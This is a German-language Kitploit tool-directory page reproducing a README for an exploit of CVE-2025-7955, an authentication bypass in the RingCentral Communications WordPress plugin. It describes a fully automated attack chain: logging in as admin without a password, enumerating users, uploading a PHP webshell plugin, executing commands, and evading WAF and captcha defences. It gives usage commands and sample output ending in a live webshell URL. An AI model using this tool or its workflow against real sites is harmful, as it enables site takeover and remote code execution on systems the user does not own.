Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/nxploited/cve-2025-7955
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsCommand and ControlAuthentifizierungRed Teaming
GitHubnxploited/cve-2025-7955

CVE-2025-7955

RingCentral Communications 1.5 - 1.6.8 - Fehlende serverseitige Verifizierung zur Authentifizierungsumgehung über die Funktion ringcentral_admin_login_2fa_verify

1vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

CVE-2025-7955

RingCentral Communications 1.5 - 1.6.8 - Fehlende serverseitige Verifizierung führt zu Authentication-Bypass über die Funktion ringcentral_admin_login_2fa_verify

🚨 CVE-2025-7955 | RingCentral Communications WordPress-Exploit


📝 Schwachstellenübersicht

CVE: CVE-2025-7955
Betroffenes Plugin: RingCentral Communications (WordPress)
Betroffene Versionen: 1.5 – 1.6.8
CVSS-Score: 9.8 (Kritisch)
Typ: Authentication-Bypass (fehlende serverseitige Verifizierung)

Das RingCentral Communications Plugin für WordPress ist aufgrund einer fehlerhaften Validierung innerhalb der Funktion ringcentral_admin_login_2fa_verify() anfällig für einen Authentication-Bypass. Die Versionen 1.5 bis 1.6.8 erlauben nicht authentifizierten Angreifern, sich als beliebiger Benutzer anzumelden, indem sie einfach identische gefälschte Codes übermitteln.


⚡ Skriptfunktionen

Dieser Exploit automatisiert die gesamte Angriffskette für CVE-2025-7955. Er ist darauf ausgelegt:

  • Authentication umgehen: Das Skript meldet sich ohne Passwort als beliebiger Benutzer (normalerweise Admin) bei WordPress an, indem es den verwundbaren 2FA-Endpunkt ausnutzt.
  • Benutzernamen automatisch ermitteln: Wenn der Benutzername nicht angegeben wird, versucht das Skript, ihn über die WordPress-REST-API (/wp-json/wp/v2/users/ID) zu enumerieren.
  • Erforderliche Tokens extrahieren: Ruft automatisch das für Plugin-Uploads benötigte CSRF-Schutz-Nonce ab.
  • Bösartiges Plugin (Webshell) hochladen: Nach der Authentifizierung lädt das Skript ein ZIP-Plugin mit einer PHP-Webshell hoch.
  • Befehlsausführung über die Webshell: Nach erfolgreichem Upload demonstriert das Skript die Codeausführung, indem es whoami über die Shell ausführt und die Ausgabe ausgibt.
  • Stealth- & Umgehungsfunktionen: Verwendet zufällige Verzögerungen, eine rotierende User-Agent-Liste und grundlegende WAF-/Captcha-Erkennung, um einfache Schutzmaßnahmen zu umgehen.

🚀 Verwendung

  1. Bereiten Sie Ihr bösartiges Plugin vor
    Stellen Sie sicher, dass sich Ihre bösartige Plugin-ZIP-Datei (Standard: Nxploit.zip) im selben Verzeichnis wie das Skript befindet.

  2. Exploit ausführen:

    root@kitploit:~
    python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
    
    • -u, --url : (erforderlich) URL der Ziel-WordPress-Site
    • -user, --username : (optional) Benutzername, mit dem angemeldet werden soll (wird bei Weglassen automatisch ermittelt)
    • -id, --id_admin : (Standard: 1) Benutzer-ID (Admin ist normalerweise ID 1)
    • -z, --zip : (Standard: Nxploit.zip) Pfad zur bösartigen Plugin-ZIP
  3. Beispiel:

    root@kitploit:~
    python3 CVE-2025-7955.py -u http://target/wordpress
    

✅ Erwartete erfolgreiche Ausgabe

root@kitploit:~
888b    888                   888          d8b 888                 888 
8888b   888                   888          Y8P 888                 888 
88888b  888                   888              888                 888 
888Y88b 888 888  888 88888b.  888  .d88b.  888 888888 .d88b.   .d88888 
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888   d8P  Y8b d88" 888 
888  Y88888   X88K   888  888 888 888  888 888 888   88888888 888  888 
888   Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b.     Y88b 888 
888    Y888 888  888 88888P"  888  "Y88P"  888  "Y888 "Y8888   "Y88888 
                     888                                               
                     888                                               
                     888                                               
CVE-2025-7955 Exploit By : Nxploited 

[*] Using User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Attempting login as: admin (ID: 1)
[+] Login successful!
[+] Nonce: 661e57f2e4
[*] Uploading malicious plugin...
[+] Plugin uploaded successfully!
[*] Executing: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND

🎯 Hauptfunktionen

  • Kein Passwort erforderlich: Nutzt einen Logikfehler aus, um die Authentifizierung vollständig zu umgehen.
  • Automatische Enumeration: Kann Benutzernamen und IDs über eine öffentliche API extrahieren.
  • Vollautomatische Ausnutzung: Vom Login über den Webshell-Upload bis zur Befehlsausführung sind alle Schritte automatisiert.
  • Basis-Umgehungsfunktionen: Zufällige Verzögerungen, Header-Spoofing und grundlegende Erkennung von Schutzmechanismen.
  • Modular: Die Plugin-Payload lässt sich leicht modifizieren oder bei Bedarf um Funktionen erweitern.

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt.
Die unbefugte Verwendung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Testgenehmigung haben, ist illegal und unethisch.
Der Autor übernimmt keinerlei Verantwortung für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.


Von: Khaled Alenazi (Nxploited)

Tool herunterladen

oder Benutzername/ID angeben:

root@kitploit:~
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1